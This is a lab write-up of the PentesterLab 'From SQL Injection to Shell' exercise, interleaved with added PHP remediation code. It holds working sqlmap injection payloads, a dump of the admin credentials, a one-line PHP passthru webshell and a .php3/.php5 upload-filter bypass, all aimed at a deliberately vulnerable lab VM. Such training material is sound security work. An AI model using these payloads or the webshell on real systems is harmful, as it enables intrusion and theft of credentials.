
PentesterLab – From SQL Injection to Shell

https://pentesterlab.com/exercises/from_sqli_to_shell/course

Note: there are tons of methods to solve it 🙂 I tried the fastest one. Doing everything by "hand" (no tools) gives the best learning experience, of course.

We have the VM .. now what?

Find its IP :))
Start it, then go to the host and run:
nmap -v '10.42.0.*' -p 80

Nmap scan report for 10.42.0.6
Host is up (0.00043s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

(the VM was set up with a bridged adapter).

Open it in the browser now. Clicking around will show us a first GET parameter: http://10.42.0.6/cat.php?id=1

Playing with it (for example, appending a single quote ' after the 1) produces the familiar MySQL syntax error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1
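That error is the symptom of a query built by string concatenation. The write-up does not show the source of cat.php, so the following is an added example (not the exercise's own code) of the vulnerable pattern beside its hardened form. It assumes PHP 7+ with mysqli/mysqlnd, a `pictures` table with the columns seen in the sqlmap dump, and placeholder database credentials:

```php
<?php
// Added example, not the exercise's own cat.php (whose source the write-up does not show).
// Assumes a mysqli connection and a `pictures` table with the columns id, img, cat, title
// that appear in the sqlmap dump; the DB credentials below are placeholders.

mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);   // turn driver errors into exceptions

// Vulnerable pattern: the GET parameter is spliced into the SQL text. With id=1' the
// query becomes  ... WHERE cat = 1'  which is exactly the syntax error quoted above,
// and with id=1 UNION ALL SELECT ... the attacker chooses which columns come back.
function pictures_for_category_vulnerable(mysqli $db, string $id): array
{
    $sql = "SELECT id, img, title FROM pictures WHERE cat = " . $id;
    return $db->query($sql)->fetch_all(MYSQLI_ASSOC);
}

// Hardened pattern: check the type first, then bind the value as a parameter so the
// server receives it as data and never parses it as SQL. A bad id is a 400, not a DB error.
function pictures_for_category(mysqli $db, string $id): array
{
    if (!ctype_digit($id)) {
        http_response_code(400);
        exit('invalid category id');
    }
    $stmt = $db->prepare("SELECT id, img, title FROM pictures WHERE cat = ?");
    $stmt->bind_param('i', $id);        // 'i' = bind as integer
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);   // get_result() needs mysqlnd
}

// Never echo the driver's message to the browser: the MySQL error text quoted above is
// what confirmed the injection for the attacker. Log it and return a generic page instead.
$db = new mysqli('localhost', 'photoblog', 'DB_PASSWORD_PLACEHOLDER', 'photoblog');
try {
    foreach (pictures_for_category($db, $_GET['id'] ?? '') as $row) {
        printf("<p>%s</p>\n", htmlspecialchars($row['title'], ENT_QUOTES, 'UTF-8'));
    }
} catch (mysqli_sql_exception $e) {
    error_log('cat.php: ' . $e->getMessage());
    http_response_code(500);
    echo 'Something went wrong.';
}
```

The parameter binding is the fix; the `ctype_digit` check and the generic error page are defence in depth. Without the last part, every injection technique sqlmap reports below (error-based in particular) gets a verbose oracle for free.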

What does that tell us? 😀 .. sqlmap
(of course we can run sqlmap -a -u URL for everything, but for the sake of the exercise let's see it step by step):

sqlmap --tables -u 'http://10.42.0.6/cat.php?id=1'

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 08:59:27

[08:59:27] [INFO] resuming back-end DBMS 'mysql' 
[08:59:27] [INFO] testing connection to the target URL
[08:59:27] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6749=6749

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 3352 FROM(SELECT COUNT(*),CONCAT(0x716b767871,(SELECT (ELT(3352=3352,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767871,0x485a735a576b785743455145644767476f454b4d667a4d51696679697a4858597976465852676e4b,0x7171787071),NULL-- pFAj
---
[08:59:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[08:59:27] [INFO] fetching database names
[08:59:27] [INFO] fetching tables for databases: 'information_schema, photoblog'
Database: photoblog
[3 tables]
+---------------------------------------+
| categories                            |
| pictures                              |
| users                                 |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+

[08:59:27] [INFO] fetched data logged to text files under '/home/unknown/.sqlmap/output/10.42.0.6'

[*] shutting down at 08:59:27

Yuppy, we can see the 'users' table 🙂 .. let's go for an account.

sqlmap --dump -D photoblog -u 'http://10.42.0.6/cat.php?id=1'

        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:02:52

[09:02:52] [INFO] resuming back-end DBMS 'mysql' 
[09:02:52] [INFO] testing connection to the target URL
[09:02:52] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 6749=6749

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 3352 FROM(SELECT COUNT(*),CONCAT(0x716b767871,(SELECT (ELT(3352=3352,1))),0x7171787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b767871,0x485a735a576b785743455145644767476f454b4d667a4d51696679697a4858597976465852676e4b,0x7171787071),NULL-- pFAj
---
[09:02:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0
[09:02:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:02:52] [INFO] fetching current database
[09:02:52] [INFO] fetching tables for database: 'photoblog'
[09:02:52] [INFO] fetching columns for table 'pictures' in database 'photoblog'
[09:02:52] [INFO] fetching entries for table 'pictures' in database 'photoblog'
[09:02:52] [INFO] analyzing table dump for possible password hashes
Database: photoblog
Table: pictures
[3 entries]
+----+-------------+-----+---------+
| id | img         | cat | title   |
+----+-------------+-----+---------+
| 1  | hacker.png  | 2   | Hacker  |
| 2  | ruby.jpg    | 1   | Ruby    |
| 3  | cthulhu.png | 1   | Cthulhu |
+----+-------------+-----+---------+

[09:02:52] [INFO] table 'photoblog.pictures' dumped to CSV file '/home/unknown/.sqlmap/output/10.42.0.6/dump/photoblog/pictures.csv'
[09:02:52] [INFO] fetching columns for table 'users' in database 'photoblog'
[09:02:52] [INFO] fetching entries for table 'users' in database 'photoblog'
[09:02:52] [INFO] analyzing table dump for possible password hashes
[09:02:52] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to crack them via a dictionary-based attack? [Y/n/q] 
[09:02:57] [INFO] using hash method 'md5_generic_passwd'
[09:02:57] [INFO] resuming password 'P4ssw0rd' for hash '8efe310f9ab3efeae8d410a8e0166eb2' for user 'admin'
[09:02:57] [INFO] postprocessing table dump
Database: photoblog
Table: users
[1 entry]
+----+-------+---------------------------------------------+
| id | login | password                                    |
+----+-------+---------------------------------------------+
| 1  | admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+----+-------+---------------------------------------------+

[09:02:57] [INFO] table 'photoblog.users' dumped to CSV file '/home/unknown/.sqlmap/output/10.42.0.6/dump/photoblog/users.csv'
[09:02:57] [INFO] fetching columns for table 'categories' in database 'photoblog'
[09:02:57] [INFO] fetching entries for table 'categories' in database 'photoblog'
[09:02:57] [INFO] analyzing table dump for possible password hashes
Database: photoblog
Table: categories
[3 entries]
+----+--------+
| id | title  |
+----+--------+
| 1  | test   |
| 2  | ruxcon |
| 3  | 2010   |
+----+--------+

[09:02:57] [INFO] table 'photoblog.categories' dumped to CSV file '/home/unknown/.sqlmap/output/10.42.0.6/dump/photoblog/categories.csv'
[09:02:57] [INFO] fetched data logged to text files under '/home/unknown/.sqlmap/output/10.42.0.6'

[*] shutting down at 09:02:57

So the account is admin / P4ssw0rd (unsalted MD5).

Note: if sqlmap can't break the password, use the online tools or https://github.com/Talanor/findmyhash, or whatever else you prefer.
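The reason the hash fell in the same second it was dumped is the storage scheme, not the dump. As an added example (not part of the exercise), here is the unsalted-MD5 scheme the `md5_generic_passwd` result implies, beside what a PHP 5.5+ application should store, plus a login routine that upgrades legacy hashes on first successful use. The `$save_new_hash` callback and the stored-hash format check are assumptions for the illustration:

```php
<?php
// Added example, not the exercise's own code. Shows why the dumped hash in the
// users table was matched immediately, and the replacement a PHP 5.5+ app should use.

// What the photoblog evidently did (inferred from sqlmap's 'md5_generic_passwd' result):
// one fast, unsalted digest per password. Two users with the same password get the
// same hash, and a bare 32-hex-char MD5 is a straight lookup in precomputed tables.
function legacy_hash(string $password): string
{
    return md5($password);
}

// What to store instead: password_hash() picks a random salt per user and a
// deliberately slow algorithm (bcrypt here), so a dumped table cannot be matched
// against a wordlist cheaply, and identical passwords produce different strings.
function store_hash(string $password): string
{
    return password_hash($password, PASSWORD_BCRYPT, ['cost' => 12]);
}

// Login check. password_verify() reads salt and cost from the stored string and
// compares in constant time. If the stored value is still a legacy MD5 (32 hex chars),
// accept it once and immediately replace it, so the old hash leaves the table.
// $save_new_hash is an assumed callback that writes the new hash for this user.
function check_login(string $stored, string $password, callable $save_new_hash): bool
{
    if (preg_match('/^[0-9a-f]{32}$/', $stored)) {           // legacy unsalted MD5
        if (!hash_equals($stored, legacy_hash($password))) {
            return false;
        }
        $save_new_hash(store_hash($password));               // upgrade on the spot
        return true;
    }
    if (!password_verify($password, $stored)) {
        return false;
    }
    if (password_needs_rehash($stored, PASSWORD_BCRYPT, ['cost' => 12])) {
        $save_new_hash(store_hash($password));               // cost was raised since
    }
    return true;
}

// Usage with the values from the dump above: the legacy hash is accepted once and
// $upgraded then holds a "$2y$12$..." bcrypt string that replaces it.
$stored   = '8efe310f9ab3efeae8d410a8e0166eb2';
$upgraded = null;
$ok = check_login($stored, 'P4ssw0rd', function (string $h) use (&$upgraded) { $upgraded = $h; });
var_dump($ok, $upgraded);
```

On a PHP 5.3 box like the exercise VM the `password_*` functions do not exist; the ircmaxell/password_compat library provides the same API down to 5.3.7. Note that this is the mitigation for the hash being cracked, not for the hash being dumped: only the parameterised query prevents the dump.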

After logging in to the admin side we see an upload field at http://10.42.0.6/admin/new.php, so that tells us how to get to the shell: by uploading a script (webshell).
The easiest one, considering we are running Apache + PHP, is one that uses exec/passthru/system, whatever you like 🙂

<?php passthru ($_REQUEST['cmd']); ?>

But we will see that it doesn't allow .php files to be uploaded, so try .php3 or .php5 instead, and then call it with the GET/POST parameter payload you want, for example:

http://10.42.0.6/admin/uploads/ffff.php3?cmd=whoami
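The .php3/.php5 trick works because the upload form checks the name against a blocklist while Apache's PHP handler maps several extensions. As an added example (not the exercise's admin/new.php, whose source is not shown), here is that blocklist check beside an allowlist-plus-content check, a server-chosen filename, and the Apache directives that stop the upload directory from executing anything at all. The form field name `picture`, the filesystem paths and PHP 7.1+ are assumptions:

```php
<?php
// Added example, not the exercise's admin/new.php. A blocklist that refuses only ".php"
// is bypassed by any other extension the PHP handler is mapped to, e.g. .php3, .php5, .phtml.

function upload_allowed_blocklist(string $filename): bool
{
    // Rejects "shell.php" only: "shell.php3", "shell.php5" and "shell.phtml" all pass.
    return strtolower(pathinfo($filename, PATHINFO_EXTENSION)) !== 'php';
}

function upload_allowed_allowlist(string $filename, string $tmp_path): bool
{
    // 1. Allowlist the few extensions a photo blog needs; everything else is refused.
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    if (!in_array($ext, ['png', 'jpg', 'jpeg', 'gif'], true)) {
        return false;
    }
    // 2. Look at the bytes, not the name: a PHP script renamed to .png fails getimagesize().
    //    (A real image can still carry PHP in its metadata, so this is defence in depth;
    //    the decisive control is the server config below.)
    $info = @getimagesize($tmp_path);
    return $info !== false && in_array($info['mime'], ['image/png', 'image/jpeg', 'image/gif'], true);
}

// 3. Store under a random server-chosen name, so the client never controls the final
//    path or extension, in a directory that is served as static files only.
function store_upload(array $file, string $dir): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    if (!upload_allowed_allowlist($file['name'], $file['tmp_name'])) {
        return null;
    }
    $ext  = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    return move_uploaded_file($file['tmp_name'], $dir . '/' . $name) ? $name : null;
}

// 4. Server-side control that does not depend on the name check at all (Apache + mod_php,
//    httpd.conf; the directory path is an assumption). Nothing under the upload directory
//    is ever handed to the PHP engine, whatever it is called:
//
//    <Directory "/var/www/admin/uploads">
//        php_admin_flag engine off
//        <FilesMatch "\.ph(p[0-9]?|tml|ar)$">
//            Order deny,allow      # Apache 2.2 syntax, as on the exercise VM
//            Deny from all         # Apache 2.4: Require all denied
//        </FilesMatch>
//    </Directory>

// Usage in the upload handler: 'picture' is the assumed form field name.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['picture'])) {
    $saved = store_upload($_FILES['picture'], '/var/www/photoblog_uploads');
    echo $saved === null ? 'upload rejected' : 'stored as ' . htmlspecialchars($saved, ENT_QUOTES, 'UTF-8');
}
```

Of the four layers, the Apache directives are the one that would have stopped this exercise outright even with the original blocklist in place; the allowlist and content check reduce what reaches the disk, and the random name removes the attacker's ability to predict the URL of whatever does.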

For nicer webshells, check this one out:

https://github.com/epinna/weevely3